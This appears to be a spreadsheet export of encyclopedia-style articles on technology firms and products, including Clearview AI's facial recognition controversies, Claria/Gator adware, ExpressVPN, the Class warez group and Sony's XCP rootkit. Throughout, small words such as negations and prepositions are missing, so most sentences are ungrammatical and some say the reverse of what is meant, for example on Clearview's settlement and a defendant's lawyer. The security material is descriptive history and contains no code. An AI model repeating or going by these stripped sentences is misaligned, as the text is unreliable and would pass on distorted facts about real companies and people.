aclu washington sent letter seattle mayor jenny durkan, asking seattle police department using clearview letter cited public records retrieved local blogger, showed officer signing repeatedly logging service, well corresponding company representative. while aclu letter raised concerns officer's usage violated seattle surveillance ordinance, auditor city seattle office inspector general argued ordinance designed address usage surveillance technologies department itself, officer without department's knowledge.in april 2021, documents obtained legal society york's freedom information demonstrated clearview's expansive, multi-year collaboration nypd. these records demonstrated, contrary past nypd denials, clearview provided accounts numerous nypd officers, senior nypd leadership, entered vendor contract nypd. clearview came renewed scrutiny enabling officers conduct large numbers searches without formal oversight approval. on-boarding emails, users encouraged beyond running searches "[s]ee reach searches".the company announced first chief strategy officer, chief revenue officer chief marketing officer 2021. devesh ashra, former deputy assistant secretary united states department treasury, became chief strategy officer. chris metaxas, former executive lexisnexis risk solutions, became chief revenue officer. susan crandall, former marketing executive lexisnexis risk solutions motorola solutions, became chief marketing officer. later month, company numerous legal complaints filed austria, france, greece, italy united kingdom violating european privacy laws method documenting collecting internet data.in august 2021, clearview announced formation advisory board including raymond kelly, richard clarke, rudy washington, floyd abrams, wolosky, owen west. company claimed scraped billion images october 2021.in march 2022, ton-that told reuters ukraine's ministry defence began using clearview ai's facial recognition technology march 2022 startup "offered uncover russian assailants, combat misinformation identify dead". ton-that also claimed "more billion images russian social media service vkontakte disposal". april 2022, york times reported clearview created accounts users five ukrainian government agencies, conducted 5,000 searches, clearview also translated ukrainian. ton-that provided emails officials three agencies ukraine, confirming used tool identify dead soldiers prisoners war, well travelers country.in 2022, clearview announced would expanding sales facial recognition software private-sector particular apps school management systems), scraping images social media profiles. marketing efforts pushback clearview's marketing claimed facial recognition terrorist arrest. identification submitted york police department line, nypd identify suspect, stated institutional relationship clearview, though 'rogue officers' clearview claims solved york cases cold cases, later stating submitted lines.the company sent cease desist letter office jersey attorney general gurbir grewal including promotional video website images grewal. clearview claimed played role jersey police sting, grewal confirmed used identify child predators. banned clearview counties jersey. ekeland, lawyer clearview, confirmed marketing video taken day.on march 2020, wall street journal stated clearview pitching technology states contact tracing assist covid-19 pandemic. fight future's responded calling clearview cartoonishly shady surveillance vendor, idea overall backlash.senator edward markey wrote clearview ton-that, stating "widespread technology could facilitate dangerous behavior could effectively destroy individuals' ability daily lives anonymously." markey asked clearview detail aspects business understand privacy, bias, security concerns. clearview responded attorney, declining reveal information. response this, markey wrote second letter, calling response unacceptable containing dubious claims, highlighting concern clearview "selling technology authoritarian regimes" possible violations coppa. senator markey wrote third letter company concerns, stating "this health crisis cannot justify using unreliable surveillance tools could undermine privacy rights." markey asked series questions government entities clearview talking with, addition unanswered privacy concerns.senator wyden voiced concerns clearview meetings ton-that cancelled three occasions.in 2022, terms aclu settlement, clearview agreed permanent selling facial recognition database private companies. technology clearview states technology public consumption meant enforcement usage, marketing material encouraged users "run wild" use, suggesting searching family friends well celebrities. clearview also indicated targeting private security firms marketed casinos clearview's jessica medeiros garrison. clearview planned expansion many countries, including brazil, colombia, nigeria, cluster buzzfeed titles "authoritarian regimes" including united arab emirates, qatar, singapore, general data protection regulation-following countries including italy, greece, netherlands.while clearview's supposed privately accessible customers, gizmodo found android application package unsecured amazon bucket. addition application tracking (google analytics, crashlytics), contains references google play services (firebase appmeasurement), requests precise phone location data, appeared features voice search, sharing free demo account users, augmented reality integration vuzix, sending gallery photos taking photos itself. there also references scanning barcodes drivers license realwear.techcrunch found application apple devices unsecured bucket. instructions showed load enterprise (developer) certificate could installed without published store. clearview's access suspended, apple's terms service developers. this "effectively disables app".buzzfeed discovered clearview also operates secondary business, insight camera, provides ai-enabled security cameras. targeted "retail, banking residential buildings". customers used technology, united federation teachers rudin management. accuracy documents clearview claimed 98.6% 100% accuracy using standard 99.6% confidence interval. clearview provided october 2019 document north miami police department indicating used public review panel, consisting jonathan lippman (former chief judge york court appeals, currently latham watkins, introduced richard schwartz), nicholas cassimatis (businessperson), aaron renn (formerly manhattan institute) using methodology aclu used test amazon rekognition. jacob snow aclu responded, stating clearview's test "couldn't different aclu's work", pointed accuracy flaws lack actual racial bias methodology, objected clearview implying aclu might endorse "dangerous untested surveillance product".in 2021, clearview announced developing “deblur” “mask removal” tools sharpen blurred images envision covered part individual’s face. these tools would accomplished using machine learning models fill missing details based statistical patterns found images. clearview acknowledged deblurring image and/or removing mask could potentially make errors frequently would used generate leads police investigations.clearview ranked amongst facial recognition algorithms accuracy test national institute standards technology (nist). test determined accurate clearview's algorithm matching different photos person test matching unknown face billion image database. completed october 2021 sole third-party test time. customer list following data leak clearview's customer list, buzzfeed confirmed 2,200 organizations countries accounts activity. some trial access, many organizations denied connection clearview. american enforcement government commercial non-government entities international enforcement cases zealandthe zealand police used trial approached clearview's marko jukic january 2020. jukic said would helped identify christchurch mosque shooter technology available. during police's trial searched people māori polynesian ethnicity", well "irish roof contractors" determine bias accuracy. this raised strong objections exposed, neither users' supervisors privacy commissioner aware approved use. after revealed rnz, justice minister andrew little stated know came person thought good idea", going clearly endorsed, senior police hierarchy, clearly endorsement [police] minister indeed wider cabinet matter concern." floridaclearview's technology used identifying individual 2020 george floyd police violence protest miami, florida. miami's wtvj confirmed this, arrest report said "identified investigative means". defendant's attorney even know clearview. ton-that confirmed use, noting used surveillance, investigate crime. legal challenges company's claim first amendment right public information disputed privacy lawyers scott skinner-thompson margot kaminski, highlighting problems precedents surrounding persistent surveillance anonymity. former york city police commissioner executive chairman teneo risk chief bill bratton challenged privacy concerns recommended strong procedures enforcement usage op-ed york daily news.after release york times january 2020 article, lawsuits filed states illinois, california, virginia york, citing violations privacy safety laws. most lawsuits transferred york's southern district. lawsuits filed state courts; vermont attorney general illinois behalf american civil liberties union, cited statute forbids corporate residents' faceprints without explicit consent. clearview countered illinois apply company based york.in response class action lawsuit filed illinois violating biometric information privacy (bipa), 2020 clearview stated instituted policy stop working non-government entities remove photos geolocated illinois. 2020, aclu edelson sued clearview illinois using bipa.clearview hired ekeland wolosky jenner block legal team. ekeland used section defense clearview lawsuit attorney general vermont. techdirt's cushing analyzed arguments, stating essence, lawsuit objectionable content hosted clearview, objectionable actions clearview itself. that's section apply. sure local court read this, would seem readily apparent section immunize clearview case." company also hired paul clement, former solicitor general former acting united states attorney general help assuage privacy concerns.in august 2020, york times reported clearview hired first amendment pentagon papers lawyer floyd abrams. abrams argued cases front supreme court united states, notably citizens united fec, stated issue privacy rights versus free speech first amendment could reach supreme court.in july 2020, clearview announced pulling canadian market amidst joint investigations company product police forces. daniel therrien, privacy commissioner canada condemned clearview ai's scraped biometric data: what clearview mass surveillance illegal. completely unacceptable millions people never implicated crime find continually police lineup.in june 2021, therrien found royal canadian mounted police broken canadian privacy hundreds illegal searches using clearview ai.in january 2021, clearview ai's biometric photo database deemed illegal hamburg data protection authority (dpa). deletion affected person's biometric data ordered. authority stated gdpr applicable despite fact clearview european branch. march 2020, requested clearview ai's customer list, data protection obligations would also apply customers. data protection advocacy organization noyb criticized dpa's decision issued order protecting individual complainant instead order banning collection european resident's photos.in november 2021, clearview received provisional notice uk's information commissioner's office (ico) stop processing citizens' data citing range alleged breaches. company also notified potential fine approximately $22.6 million. clearview claimed ico's allegations factually inaccurate would consider appealing company "does business customers time." released statement final determination clearview would occur mid-2022. reported company fined "more £7.5m uk's privacy watchdog told delete data residents."in 2022, clearview agreed settle 2020 lawsuit aclu, prohibited sale facial recognition database private individuals businesses. clearview paid $250,000 legal fees agreed limit billion facial photo database government agencies.in 2022, clearview ordered delete data belonging residents’ facial recognition data country’s privacy watchdog, information commissioner’s office (ioc). additionally, fined clearview £7.5 million failing follow uk’s data protection laws. this fine marked fourth type placed clearview, similar orders fines issued australia, france, italy. also labs linkedin references</t>
  </si>
  <si>
    <t>CleanBrowsing</t>
  </si>
  <si>
    <t>cleanbrowsing free public resolver content filtering, founded daniel tony perez. supports port http port addition standard port cleanbrowsing filters used parents protect children adult inappropriate content online. services cleanbrowsing standard filters accessible following anycast addresses: family filter blocks access adult content, proxy vpns, phishing malicious domains. enforces safe search google, bing youtube. adult filter less restrictive family filter blocks access adult content malicious/phishing domains. security filter blocks access malicious phishing domains. also public recursive name servers references external links official website</t>
  </si>
  <si>
    <t>Class (warez)</t>
  </si>
  <si>
    <t>class (cls) notorious prolific warez group existed january 1997 january 2004. group target federal raids operation fastlink. they specialized cracked games, sometimes elaborate cracktro release (i.e. music, animation, logo designs, etc.). they global group many members worldwide. class used group abbreviation, cls, suffix files released. this group involved long-standing rivalry competing game pirating group known myth. groups released strictly ripped games, opposed image content released groups fairlight. games would split base rip, would little content possible fully play game; additional media (usually movies digital music) would released add-ons. releases, intro movie add-ons released well. they used advanced compression methods (most notably ace) reduce size required downloads much possible; installers specially crafted abnormally compressed files. many releases included wave injector/uharc compression scheme, decompressed situated files specific folder. these programs core operation, programs (wave injector coded class/backlash) vital decompressing rips (i.e. games). class stopped producing january 2004, releasing "endtro." this stated 1,234 releases giving "throne." quotes april 2004, united states department justice repeatedly singled class five warez-related organizations sweep internet copyright infringement known operation fastlink: among groups targeted fastlink well-known organizations fairlight, kalisto, echelon, class project specialized pirating computer games, music release groups apc. source: united states department justice press releaseoperation fastlink identified nearly individuals worldwide. many leaders high-level members prolific international "warez" [wares] release groups names like fairlight, kalisto, echelon, class project source: prepared remarks united states attorney general john ashcroft also list warez groups warez scene references external links class file information repository defacto2 incomplete collection cracktros released class indexed pouet</t>
  </si>
  <si>
    <t>Clario Tech</t>
  </si>
  <si>
    <t>clario security software development company offers consumer-facing digital security privacy applications range operating systems including ios, android, macos.clario tech allegedly team members various worldwide locations, majority appear operating ukraine. workforce consists software developers, marketing specialists, security researchers customer support agents. 2019, company announced would invest million 2020 develop cybersecurity products make accessible all. products clario clario security application officially launched consumer electronic awards january 2020 vegas. clario announced offer online security product user-friendly dashboard, integrating cybersecurity technology 24/7 human support digital threats.the cybersecurity application reviewed various publications including evening standard called “uber cybersecurity”.in response covid-19 pandemic, clario launched 24/7 support hotline anyone call experienced technology issues lockdown. company’s 600+ team hand respond reported issues. clario received av-test certification december 2020 featured honorable mentions list privacy focused tool nomination part product hunt’s 2020 golden kitty award winners 2020. macupdate macupdate macintosh software download website founded 1997 joel mueller. 2017, site sold zeobit, subsequently acquired clario tech 2020. mackeeper mackeeper utility software offers system cleaning, privacy features antivirus macos. clario tech become owner mackeeper software since 2019 accelerate transformation mackeeper. clario cybersecurity research clario tech undertaken numerous pieces research cybersecurity trends 2020 2021. these include "which company uses most your data?", "the state cybercrime uk", "cybercrime hotspots". references</t>
  </si>
  <si>
    <t>Facebook Credits</t>
  </si>
  <si>
    <t>facebook credits virtual currency enabled people purchase items games non-gaming applications facebook platform. u.s. dollar equivalent facebook credits. facebook credits available currencies including u.s. dollars, pound sterling, euros, danish kroner. facebook hoping eventually expand credits micropayment system open facebook application, whether game media company application. facebook deprecated credits favour users' local currencies.facebook credits went alpha stage 2009 progressed beta stage february 2010, ended january 2011. time, facebook announced facebook game developers would required process payments facebook credits july 2011.facebook retains developers revenue earned credits. credits single currency used multiple games applications, introduction former paypal executives comment whether credits could soon replace paypal leader virtual payments. 2010, expected facebook users would purchase credits majority virtual goods sold social network.in march 2011, facebook created official subsidiary handle payments: facebook payments inc.in june 2012, facebook announced would longer money system, facebook credits. users credits converted currencies. facebook credits officially removed facebook september 2013. using credits over developers used facebook credits facebook games applications, represented virtual goods purchased facebook. developers offered facebook credits include zynga (farmville, frontierville), crowdstar (happy aquarium, hellocity), popcap games (bejeweled blitz) well playdom, playfish, rockyou, 6waves.in september 2010, announced facebook credits would become exclusive payment method games developed zynga hosted facebook. zynga number facebook application developer expected earn $500 million 2010 virtual goods.it announced april 2011 facebook users able credits purchase vouchers redeemed real goods services using "deals" offering. obtaining credits addition purchasing credits within facebook, number online offline channels earning buying facebook credits. these include following. gift cards u.s., target, walmart, best buy, radio shack, gamestop, safeway sell facebook credit gift cards stores. facebook credits gift cards sold tesco game shops u.k. facebook credits gift cards also sold 500,000 outlets five southeast asian countries, india, australia, zealand. rixty lets users facebook credits buying prepaid rixty giftcard coins cash stores converting facebook credits. shopkick allows users earn facebook credits checking stores iphone android application. ifeelgoods enables online retailers offer facebook credits incentives making purchases, signing e-mail newsletters, actions. appdog awards users apple android mobile device free facebook credits exchange downloading apps. downloaded apps free paid. (trialpay) issues facebook credits incentive users sign advertiser services (i.e. sign-up netflix account), complete market research surveys interact brand-sponsored videos/engagements. users access trialpay facebook platform variety ways including in-game icons dealspot 'earn credits' within game environment. regulation facebook credits virtual currencies march 2013, fincen announced guidance relating regulation virtual currencies facebook credits bitcoin these regulations impact deal virtual currencies seen fincen's first step towards regulating virtual currency opposed fiat money.) regulation currencies expands, possibility individual u.s. citizens required report substantial holdings currencies returns. also diem (digital currency) digital currency token money references external links official website (archive january 2012)</t>
  </si>
  <si>
    <t>Claria Corporation</t>
  </si>
  <si>
    <t>claria corporation (formerly gator corporation) software company based redwood city, california invented “behavioral marketing”, highly effective controversial form online advertising. founded 1998 denis coleman (co-founder symantec), stanford sasha zorovic, engineer mark pennell, based work zorovic done stanford. march 1999 jeff mcfadden hired zorovic effectively forced out. name later used interchangeably gain advertising network, claimed serviced million users. claria exited adware business second quarter 2006, eventually shut completely october 2008. "gator" (also known gain adserver) products collected personal information unknowing users, including websites visited portions credit card numbers target display computers surfers. billed "leader online behavioral marketing". company changed name claria corporation october 2003 effort "better communicate expanding breadth offerings [they] provide consumers advertisers", according president jeff mcfadden. products gator originally released 1999, gator frequently installed together programs offered free charge, go!zilla, kazaa. development programs partially funded revenue advertising displayed gator. mid-2003 gator installed estimated million pcs.even though gator installed uninstall available add/remove programs control panel microsoft windows, many spyware removal tools also detect remove gator's user license agreement attempts disallow manual removal prohibiting "unauthorized means" uninstallation.the gator software undercut fundamental ad-supported nature many internet publishers replacing banner sites own, thereby depriving content provider revenue necessary continue providing content. june 2002 number large publishers, including york post, york times, jones company, sued gator software practice replacing ads. most lawsuits settled court february 2003.gator attempted combat spyware labels litigation. september 2003 company threatened sites pitstop libel lawsuits. part settlement signed sept. (2003), pitstop--which scans computers hostile otherwise undesirable code--removed pages spyware information center titles gator spyware?" "gator boycott list." february 2004, gator made confidential settlement litigation brought seven newspaper publishers, including washington post, york post, york times, jones. washington post, l.l. bean extended stay america suits similarly settled. other defunct applications gator corporation released suite "free" internet applications performed various tasks. however, installing applications, user would continually shown gain network, even programs running foreground. this suite included: ewallet program automatically fill personal information webpages stored data entered user. gotsmiley dashbar advertisement supported search toolbar claria. intrusive displays internet browsing session. date manager precision time screenscenes weatherscope websecurealertwhile using software, user shown advertisements. according computer associates' spyware information center, applications suite classified adware spyware, display unrelated product primary user interface visible. these programs employ user's internet connection report behavior information back claria. although user's explicit consent always required install applications, claria took advantage fact users choose bothering educate installing. cases, install process, users must choose whether install "free" version (which serves lots described above) version serves ads. since announcement shut network down, claria stopped accepting payment free" versions. backers despite unpopular reputation, claria corporation received backing major venture capital firms, including greylock, technology crossover ventures, u.s. venture partners. andy bechtolsheim early investor. they filed $150 million april 2004, stating income million revenues million 2003. investors concerned practices might illegal, least utah time. another concern revenue came partner: yahoo overture. claria withdrew filing august 2004. recent news july 2005, microsoft corporation came fire revealed anti-spyware product would longer quarantine claria software "spyware" (though still offered users option remove software). microsoft reportedly contemplating purchase claria, many consumers felt conflict interest. other spyware-reporting agencies, computer associates panda software's truprevent technologies, still label claria products adware spyware. march 2006, claria claimed would exiting adware business focusing personalized search technology.on july 2006, claria ceased displaying pop-up ads. around time, company nebuad formed former claria employees another approach targeted advertisements. april 2008, claria sold gator.com domain. october, 2008, rebranded jelly cloud, company quietly shut down.today, claria's former senior management team occupy variety leadership roles throughout online marketing industry. scott vandevelde, claria's last former chief revenue officer, chief revenue officer dotomi, online advertising firm specializing personalized media. scott eagle, claria's former chief operating officer chief marketing officer, joined eharmony, online dating company, chief marketing officer. former jeff mcfadden business development marketing. former business development mitchell weisman part leadership team lifestreet corporation, largest network facebook. tony martin, claria's former engineering, engineering operations project playlist. claria's former engineering analytics, dominic bennett, claria's senior director finance dennis jang, part leadership team turn, leading online advertising dsp, engineering finance respectively. co-founder former claria mark pennell senior software engineer apple. 2016, claria's core engineering team works apple. references external links gator information center (claria) pitstop claria.com safety rating mcafee</t>
  </si>
  <si>
    <t>Face.com</t>
  </si>
  <si>
    <t>face.com (hebrew: פייס.קום) israeli technology company developed platform efficient accurate facial recognition photos uploaded mobile applications. face.com apps services scanned billions photos monthly tagged faces photos, tying social networking information. february 2011, company “discovered” billion faces across facebook applications.the company established 2009 aviv, maintained office employees. face.com developed released facebook applications: photo finder photo tagger. photo finder allowed users find untagged pictures well friends facebook photos. photo tagger enabled bulk-tagging faces appear multiple photos uploaded facebook website. june 2012, company announced acquired facebook. also announced winding api's focus facebook products. rest program march 2010, face.com opened alpha free rest api, allowing third party developers integrate face.com facial recognition technology, algorithms, database tagged faces apps services. rest gave developers free access platform's technology, applicable rate limits also offering white listing premium licensing options. with api, developers could recognize users facebook twitter, attach face.com technology index images, even match facial recognition across photo sources, including facebook, twitter, flickr, picasa, more.in february 2011, face.com's program moved alpha beta, increasing rate limit scanned photos hour 5,000 photos hour. february 10,000 developers using face api. funding face.com raised total $5.3 million funding face recognition technology. series round, totaling million raised february 2009. september 2010, company announced closed series round $4.3 million, previous investor rhodium russia-based investor yandex. june 2012, company acquired facebook undisclosed estimated million. university massachusetts study 2011, study conducted university massachusetts amherst compared portion face.com algorithm, found recognition rate 0.91 update june 2012 face.com sold facebook. technology continued project deepface. december 2015 domain face.com sold e-commerce company. references</t>
  </si>
  <si>
    <t>Fabrik Inc.</t>
  </si>
  <si>
    <t>fabrik inc. manufacturer external hard drives digital content management software services. fabrik claims third largest supplier external storage products north america 2007. headquartered mateo, offices santa culver city, california. company sells external hard drives online backup software bundled product consumers, small business users audio/video (a/v) content creation professionals. company also hosts free online digital content management sharing site, joggle.fabrik's product lines include simpletech, g-technology, joggle fabrik ultimate backup. history fabrik founded web-based software company august 2005 former maxtor executives mike cordano keyur patel. anaal udaybabu designed brand identity on-the-web storage. following month, company disclosed completion series funding $4.1 million followed million series funding july 2006 $14.3 million february 2007. then 2007, company received $24.9 million funding, bringing total $51.3 million funding.in february 2006, fabrik partnered maxtor (acquired seagate 2005) develop maxtor fusion, network-attached storage (nas) device built organizing sharing digital files, late 2006 company launched myfabrik.com, organized stored digital media online.in february 2007, company acquired consumer business simpletech, inheriting simpletech product line external hard drives consumers small businesses.in january 2008, fabrik acquired g-technology inherited suite external hard drives mac, creative pro, photography markets, including firewire esata, usb, scsi fibre channel storage products.fabrik's acquisitions introduction joggle demo conference january 2008 created four brands: simpletech, g-technology, joggle fabrik ultimate backup. simpletech g-technology products still branded maintained separate online website entities.on february 2009, hitachi global storage technologies announced agreed acquire fabrik. point fabrik revenue year (2009) estimated $350m $400m range growing yearly basis. april 2009, hitachi global storage technologies completed acquisition, formed core hitachi gst's branded business division.following acquisition, subsidiary branded 'g-technology hitachi'. products services company's simpletech products external hard drives mainstream consumers small business users. includes portable external hard drives desktop external hard drives. simpletech products come bundled free local backup software online backup capabilities. simpletech [re]drive percent recyclable enclosure several energy resource efficiency features. company claims [re]drive world's eco-friendly, resource conscious external hard drive. original design simpletech portable external storage product line inspired ferrari design team pininfarina. fabrik started free online digital content management site called joggle early 2008. site searches video, photos music user's computer, external hard drive online communities networking sites automatically consolidates single online organizing sharing tool.the company also pure online backup approach, fabrik ultimate backup, data backed remote servers using 128-bit blowfish encryption. references external links archived fabrik site archived fabrik hitachi global storage technologies site</t>
  </si>
  <si>
    <t>ExpressVPN</t>
  </si>
  <si>
    <t>expressvpn service offered british virgin islands-registered company express technologies ltd. software marketed privacy security tool encrypts users' traffic masks addresses.as september 2021, expressvpn owned kape technologies reportedly million users. history expressvpn's parent company, express international ltd, founded 2009 peter burchhardt pomerantz, serial entrepreneurs also wharton school alumni. parent company business expressvpn. january 2016, expressvpn announced would soon roll upgraded certificate. also december, expressvpn released open source leak testing tools github.in july 2017, expressvpn announced open letter apple removed apps store china, revelation later picked york times outlets. response questions u.s. senators, apple stated removed apps store china 2017 request chinese government. december, expressvpn came spotlight relation investigation assassination russian ambassador turkey, andrei karlov. turkish investigators seized expressvpn server used delete relevant information assassin's gmail facebook accounts. turkish authorities unable find logs investigation, company said verified claim store user activity connection logs, adding; "while unfortunate security tools like vpns abused illicit purposes, critical safety preservation right privacy online. expressvpn fundamentally opposed efforts install 'backdoors' attempts governments otherwise undermine technologies."in december 2019, expressvpn became founding member trust initiative, advocacy group online safety consumers.in 2020, company released protocol developed expressvpn called lightway, designed improve connectivity speeds reduce power consumption. october, yale privacy founder sean o'brien joined expressvpn digital security conduct original research areas privacy cybersecurity.on september 2021, reported expressvpn acquired kape technologies, lse-listed digital privacy security company. time acquisition, expressvpn reportedly million users. expressvpn announced september 2021 would remain separate service existing kape brands. september united states department justice released statement expressvpn daniel gericke, prior joining company, helped united arab emirates hack computers (including activists) without valid export license government. exchange deferred prosecution agreement, agreed $335,000 fine security clearance revoked.on april 2022, indian computer emergency response team (cert-in) ministry electronics information technology issued directive asked providers collect store user data five years. response rules require private network providers store user information, expressvpn announced move india-based servers singapore june 2022, expressvpn officially announced "refuses participate indian government's attempts limit internet freedom." features expressvpn released apps windows, macos, ios, android, linux, routers. apps 4096-bit aes-256-cbc encryption, tlsv1.2 secure user traffic. available protocols include lightway, openvpn (with tcp/udp), sstp, l2tp/ipsec, pptp.the software also features smart feature called mediastreamer, capabilities devices support them, router app, allowing router, bypassing unsupported devices gaming consoles.expressvpn incorporated british virgin islands, privacy-friendly country data retention laws, separate legal jurisdiction united kingdom.expressvpn's parent company also develops leak testing tools, enable users determine provider leaking network traffic, dns, true addresses connected vpn, switching wireless wired internet connection.in december 2021, expressvpn modified product protect log4shell, updating automatically block outgoing traffic ports used ldap.in january 2022, expressvpn launched parallel connections, backend feature simultaneously runs multiple methods connecting user given server, automatically picking connects user first. trustedserver april 2019, expressvpn announced servers solely random-access memory (ram), without need hard disk drives. theory, soon computer shut down, information server vanishes cannot recovered; next time server reboots, fresh version infrastructure spawned. this first example industry server security setup, referred trustedserver.in february 2022, expressvpn announced $100,000 bounty anyone able hack in-house technology, trustedserver.as august 2022, expressvpn's server network covered countries. lightway protocol lightway expressvpn's open source protocol. launched 2020, similar wireguard protocol, uses wolfssl encryption improve speed embedded devices routers smartphones. operating system's kernel, lightweight support auditing. reportedly 2.5x fast openvpn older protocols, improves reliability 40%, supports udp.in august 2021, expressvpn announced full public release lightway well full open-sourcing lightway’s code. reception torrentfreak included expressvpn annual comparison best providers since 2015.on january 2016, expressvpn criticized former google information security engineer marc bevand using weak encryption. bevand discovered 1024-bit used encrypt service's connections using test strength great firewall china. described expressvpn "one three commercial providers china" asserted chinese government would able factor keys potentially users. february bevand updated criticism noted company reported switched secure 4096-bit keys.in review done pcmag editor eddy 2017, service scored bottom-line although service fastest, "certainly protects data thieves spies."pc world rated service september 2017 review, commending easy-to-use software criticizing "the secrecy behind runs company."in october 2017, techradar gave service stars, calling premium service well-crafted clients, ample choice locations reliable performance."in 2018, cybersecurity website comparitech tested expressvpns leak testing tools popular services found leaks across every provider, exception expressvpn. however, clarified, fair, expressvpn built test tools applied prior publication article, already patched leaks initially detected."the service received stars vpnselector july 2019 review, putting first place among providers.in 2020, techradar cnet named service editors' choice.in 2021, techradar named expressvpn editor's choice again.in 2022, cnet recognized expressvpn editors’ choice best overall vpn. also comparison virtual private network services references notes external links expressvpn's official website</t>
  </si>
  <si>
    <t>Extended Copy Protection</t>
  </si>
  <si>
    <t>extended copy protection (xcp) software package developed british company first internet (which november 2006, changed name fortium technologies ltd) sold copy protection digital rights management (drm) scheme compact discs. used distributed sony sparked 2005 sony copy protection scandal; context also known sony rootkit. security researchers, beginning mark russinovich october 2005, described program functionally identical rootkit: computer program used computer intruders conceal unauthorised activities computer system. russinovich broke story sysinternals blog, gained attention media researchers. this ultimately civil lawsuit criminal investigations, forced sony discontinue system. while sony eventually recalled contained system, web-based uninstaller investigated noted security researchers felten alex halderman, stated activex component used removing software exposed users significant security risks, including arbitrary code execution websites internet. description version software used sony marketed "xcp-aurora". first time user attempts play windows system, user presented eula, refuse accept ejected, accept software installed. eula mention installed hidden software. software remain resident user's system, intercepting accesses drive prevent media player ripper software included xcp-aurora accessing music tracks sony obvious uninstall program provided. attempting remove software deleting associated files manually render drive inoperable registry settings program altered. however, soon discovered software could easily defeated merely using permanent marker draw dark border along edge disk. security research following mark russinovich's publication findings, security researchers quick publish analyses. many findings highly critical sony first internet. specifically, software found conceal activity manner rootkit expose users follow-on harm viruses trojans. xcp's cloaking technique, makes processes names starting $sys$ invisible, used malware "piggybacking" ensure too, hidden user's view. first malicious trojan hide discovered november 2005 according report bitdefender antivirus company.follow-up research felten halderman showed web-based uninstaller sony later offered software contained critical security problems. software installs activex component allows site software user's computer without restriction. this component used first internet's site download uninstaller, remains active afterward allowing site user visits take computer. since specific microsoft windows, effect operating systems linux, bsd, os/2, solaris, meaning users systems suffer potential harm software, also impeded ripping normal music tracks (some discs involved sony scandal contained competing technology, mediamax sunncomm, attempts install kernel extension however, permissions widespread infections among users.) although russinovich first publish rootkit, researchers discovered around time, either still analyzing chose disclose anything sooner chilling effect anti-circumvention clause digital millennium copyright act. antivirus industry response shortly independent researchers broke story, security software vendors followed releasing detailed descriptions components well software remove $sys$* cloaking component hand, software released remove cd-rom filter driver component. computer associates, makers pestpatrol anti-spyware software, characterize software trojan horse rootkit: xcp.sony.rootkit installs executable windows service, misleadingly names service "plug play device manager", employing technique commonly used malware authors fool everyday users believing part windows. approximately every seconds, service queries primary executables associated processes running machine, resulting nearly continuous read attempts hard drive. this shown shorten drive's lifespan. furthermore, xcp.sony.rootkit installs device driver, specifically cd-rom filter driver, intercepts calls cd-rom drive. process included music player (player.exe) attempts read audio section filter driver inserts seemingly random noise returned data, thus making music unlistenable. xcp.sony.rootkit loads system filter driver intercepts calls process, directory registry listings, even unrelated sony application. this rootkit driver modifies information visible operating system order cloak sony software. this commonly referred rootkit technology. furthermore, rootkit affect xcp.sony.rootkit's files. this rootkit hides every file, process, registry beginning $sys$. this represents vulnerability, already exploited hide world warcraft ring0 hacks time writing, could potentially hide attacker's files processes access infected system gained. computer associates announced, november 2005, anti-spyware product, pestpatrol, would able remove sony's software. month later, microsoft released update windows malicious software removal tool could clean f4irootkit malware.the somewhat slow incomplete response antivirus companies has, however, questioned bruce schneier, information security expert author security articles texts, including secrets lies. article wired news, schneier asks, "what happens creators malware collude companies hire protect malware?" answer "users lose... dangerous damaging rootkit gets introduced wild, half million computers infected anyone anything." impact beginning early august 2005, windows users reported crashes related program called aries.sys, inexplicably unable find file computers. this file known part xcp. call help host laporte said experienced rise reports "missing" cd-rom drives, symptom unsuccessful attempts remove xcp. security researcher kaminsky used cache analysis determine 568,000 networks worldwide contain least xcp-infected computer. kaminsky's technique uses fact nameservers cache recently fetched results, phones home specific hostname. finding servers carry hostname cache, kaminsky able approximate number networks affected. after release data, kaminsky learned as-yet undetermined number "enhanced cds" without rootkit also phone home address rootkit-affected discs use, infection rates still active investigation. flaw according analyst firm gartner, suffers flaw implementing technology (current future) tries apply audio designed played stand-alone players. according gartner, installation software relies multi-session, application (via ordinary felt-tip marker) outer edge disk renders data track unreadable, thereby causing treat disc ordinary single-session music cd.slysoft's anydvd program, removes copy protections standard hi-definition video discs, also defeats audio cds. when active audio inserted, anydvd blocks accessing session audio, rendering data sessions unreadable preventing installation malware xcp. legal concerns there much speculation extent actions taken software violation various laws unauthorized tampering computers, laws regarding invasion privacy "spyware", subject sony first internet legal liability. states california, york, texas, well italy, already taken legal action companies class action lawsuits likely. however, mere attempting view remove software order determine prevent alteration windows would theoretically constitute civil criminal offense certain anti-circumvention legislation controversial digital millennium copyright united states. electronic frontier foundation's fred lohmann also heavily criticised eula, calling "legalese rootkit."one primary reasons experiment lies issue adding legacy standard. these problems explored professor randal picker, professor university chicago school, article, "mistrust-based digital rights management", published volume journal telecommunications high technology law. incapable updating legacy hardware stand-alone players, lack ability change upgrade firmware order read drm. thus must added interfere function legacy players still work placed computer. professor picker analyzes four main issues add-on drm. first problem, demonstrated example, capable consumers simply by-pass drm. turning autorun prevented rootkit installation thus invalidated scheme. second problem consumer reaction. adding legacy product like music cds, traditionally rights management scheme, infuriate consumers. professor picker points wake negative publicity surrounding sony add-on drm, amazon.com began alerting customers sony contained xcp. customers could avoid entirely, negating effectiveness. third problem lies legal response. eff, well state attorneys general, investigated brought suit sony program. professor picker analyze legal merits suits, cost litigation potentially outweighs benefit attempting add-on drm. fourth final problem lies user license agreement attempted enforced add-on drm. ability actually enforce agreements add-on limited mere fact without active registration tracking cds, company enforce against. therefore, expected benefit enforcing eula violators actually non-existent; costs, however, implementing add-on scheme, form state federal investigations, private lawsuits, negative publicity, consumer backlash technical limitations, outweighs benefits. copyright violations researcher sebastian porst, matti nikki number software experts published evidence software infringes copyright lame encoder, mpglib,faacid3lib (id3 reading writing), mpg123 media player.princeton researcher alex halderman discovered nearly every code uses modified version johansen's drms software allows open apple computer's fairplay included. found code inactive, fully functional could insert songs fairplay. drms, mpg123 licensed general public license (gpl). software found, like lame, licensed terms lesser general public license (lgpl), also free software. claims correct, sony/bmg distributing copyrighted material illegally. johansen wrote blog talking lawyer, thinks cannot sue; however, opinions advice given wrong. lame developers open letter sony/bmg online. copyright violations sony could accused include: "prominent notices" including lgpl software. statically linking code program providing source code whole program gpl. statically linking lgpl code providing source lgpl parts binary code non-lgpl parts allow relinking updated lgpl code. placing restrictions code outside gpl/lgpl allow, e.g. "licensing charge third parties" lgpl gpl.sony already provides version id3lib's source code site, unrelated xcp. sony's response national public radio program, thomas hesse, president sony bmg's global digital business division asked, "most people, think, even know rootkit care it?" explained "the software designed protect unauthorized copying ripping." sony also contends 